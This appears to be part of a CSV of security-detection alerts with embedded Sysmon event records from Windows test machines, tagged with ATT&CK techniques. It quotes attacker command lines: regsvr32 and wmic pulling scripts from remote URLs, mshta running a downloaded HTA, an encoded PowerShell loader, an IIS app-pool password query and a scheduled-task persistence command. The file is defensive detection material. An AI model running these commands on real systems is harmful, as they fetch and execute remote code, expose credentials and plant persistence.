+[T1170] Detecting Mshta,1560582824.106609,2019-06-15T11:13:44.106609+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line ("C:\Windows\System32\mshta.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta") and Parent Image :C:\Program Files\Internet Explorer\iexplore.exe , Parent CommandLine ("C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\update.html) in directory : ( C:\Users\IEUser\Desktop\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 7648
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-06-15 07:13:42.278
+ 365ABB72-9AA6-5D04-0000-00109C850F00
+ 652
+ C:\Windows\System32\mshta.exe
+ 11.00.9600.16428 (winblue_gdr.131013-1700)
+ Microsoft (R) HTML Application host
+ Internet Explorer
+ Microsoft Corporation
+ "C:\Windows\System32\mshta.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta"
+ C:\Users\IEUser\Desktop\
+ IEWIN7\IEUser
+ 365ABB72-98E4-5D04-0000-0020A4350100
+ 0x135a4
+ 1
+ High
+ SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A
+ 365ABB72-9972-5D04-0000-0010F0490C00
+ 3660
+ C:\Program Files\Internet Explorer\iexplore.exe
+ "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\update.html
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920558.121924,2019-05-27T05:29:18.121924+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5913
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:18.081
+ 365ABB72-3D6E-5CEB-0000-00100C87FF00
+ 2896
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1558630145.862062,2019-05-23T20:49:05.862062+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( wmic process list /format:"https://a.uguu.se/x50IGVBRfr55_test.xsl" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 892
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-23 16:49:05.686
+ 365ABB72-CF01-5CE6-0000-00105DA50C00
+ 3872
+ C:\Windows\System32\wbem\WMIC.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ WMI Commandline Utility
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ wmic process list /format:"https://a.uguu.se/x50IGVBRfr55_test.xsl"
+ c:\
+ IEWIN7\IEUser
+ 365ABB72-CE6C-5CE6-0000-002047F30000
+ 0xf347
+ 1
+ High
+ SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443
+ 365ABB72-CE84-5CE6-0000-001094130600
+ 2940
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Regsvr32,1557686106.562199,2019-05-12T22:35:06.562199+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16793
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 18:35:05.765
+ 365ABB72-6759-5CD8-0000-001085031000
+ 1912
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\cmd.exe"
+ C:\Users\IEUser\
+ IEWIN7\IEUser
+ 365ABB72-63FC-5CD8-0000-0020EE3E0100
+ 0x13eee
+ 1
+ Medium
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-6759-5CD8-0000-0010E2D50F00
+ 1420
+ C:\Windows\System32\regsvr32.exe
+ regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1557686106.562199,2019-05-12T22:35:06.562199+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16793
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 18:35:05.765
+ 365ABB72-6759-5CD8-0000-001085031000
+ 1912
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\cmd.exe"
+ C:\Users\IEUser\
+ IEWIN7\IEUser
+ 365ABB72-63FC-5CD8-0000-0020EE3E0100
+ 0x13eee
+ 1
+ Medium
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-6759-5CD8-0000-0010E2D50F00
+ 1420
+ C:\Windows\System32\regsvr32.exe
+ regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1564436008.250664,2019-07-30T01:33:28.250664+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"
+
+
+
+
+ 3
+ 5
+ 4
+ 3
+ 0
+ 0x8000000000000000
+
+
+ 4915
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+ Suspicious NetCon
+ 2019-07-29 21:33:24.152
+ 747F3D96-6623-5D3F-0000-0010BC068800
+ 3000
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ MSEDGEWIN10\IEUser
+ tcp
+ true
+ false
+ 10.0.2.15
+ MSEDGEWIN10.home
+ 49828
+
+ false
+ 151.101.0.133
+
+ 443
+ https
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,1555606624.681038,2019-04-18T20:57:04.681038+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( "C:\Windows\system32\whoami.exe" /user) ,1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 14
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+ technique_id=T1033,technique_name=System Owner/User Discovery
+ 2019-04-18 16:56:24.833
+ 365ABB72-AC38-5CB8-0000-0010365E0800
+ 3576
+ C:\Windows\System32\whoami.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ whoami - displays logged on user information
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\whoami.exe" /user
+ C:\Users\IEUser\Desktop\
+ IEWIN7\IEUser
+ 365ABB72-AB27-5CB8-0000-002021CA0000
+ 0xca21
+ 1
+ High
+ SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274
+ 365ABB72-AC28-5CB8-0000-0010F3F70700
+ 1200
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ Powershell
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T0000 ] Suspicious process name detected,1555606624.681038,2019-04-18T20:57:04.681038+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /user ) contain suspicious command ( whoami.exe),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 14
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+ technique_id=T1033,technique_name=System Owner/User Discovery
+ 2019-04-18 16:56:24.833
+ 365ABB72-AC38-5CB8-0000-0010365E0800
+ 3576
+ C:\Windows\System32\whoami.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ whoami - displays logged on user information
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\whoami.exe" /user
+ C:\Users\IEUser\Desktop\
+ IEWIN7\IEUser
+ 365ABB72-AB27-5CB8-0000-002021CA0000
+ 0xca21
+ 1
+ High
+ SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274
+ 365ABB72-AC28-5CB8-0000-0010F3F70700
+ 1200
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ Powershell
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\schtasks.exe ) through command line ( C:\Windows\system32\schtasks.exe /create /sc minute /mo 1 /tn "eyNQLDvUSuvVPg" /tr "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 6195
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+ Persistence - Scheduled Task Management
+ 2019-05-27 15:12:59.558
+ 365ABB72-FE7B-5CEB-0000-0010D6820C00
+ 4044
+ C:\Windows\System32\schtasks.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Manages scheduled tasks
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ C:\Windows\system32\schtasks.exe /create /sc minute /mo 1 /tn "eyNQLDvUSuvVPg" /tr "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-7B40-5CEC-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9
+ 365ABB72-FE7B-5CEB-0000-0010867F0C00
+ 4012
+ C:\Windows\System32\cmd.exe
+ cmd.exe /c %SYSTEMROOT%\system32\schtasks.exe /create /sc minute /mo 1 /tn "eyNQLDvUSuvVPg" /tr "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920558.041809,2019-05-27T05:29:18.041809+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Line Number: 0" /text:processmodel.password ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5910
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:18.011
+ 365ABB72-3D6E-5CEB-0000-00104C83FF00
+ 2472
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Line Number: 0" /text:processmodel.password
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1557597534.762534,2019-05-11T21:58:54.762534+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16116
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-11 17:58:50.075
+ 365ABB72-0D5A-5CD7-0000-001069031700
+ 2544
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ c:\Windows\System32\cmd.exe
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-8693-5CD7-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-0D3F-5CD7-0000-00107F541600
+ 3212
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -Embedding
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1557597534.762534,2019-05-11T21:58:54.762534+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16116
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-11 17:58:50.075
+ 365ABB72-0D5A-5CD7-0000-001069031700
+ 2544
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ c:\Windows\System32\cmd.exe
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-8693-5CD7-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-0D3F-5CD7-0000-00107F541600
+ 3212
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -Embedding
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1557597534.762534,2019-05-11T21:58:54.762534+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16116
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-11 17:58:50.075
+ 365ABB72-0D5A-5CD7-0000-001069031700
+ 2544
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ c:\Windows\System32\cmd.exe
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-8693-5CD7-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-0D3F-5CD7-0000-00107F541600
+ 3212
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -Embedding
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1557686105.780949,2019-05-12T22:35:05.780949+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16792
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 18:35:05.140
+ 365ABB72-6759-5CD8-0000-0010E2D50F00
+ 1420
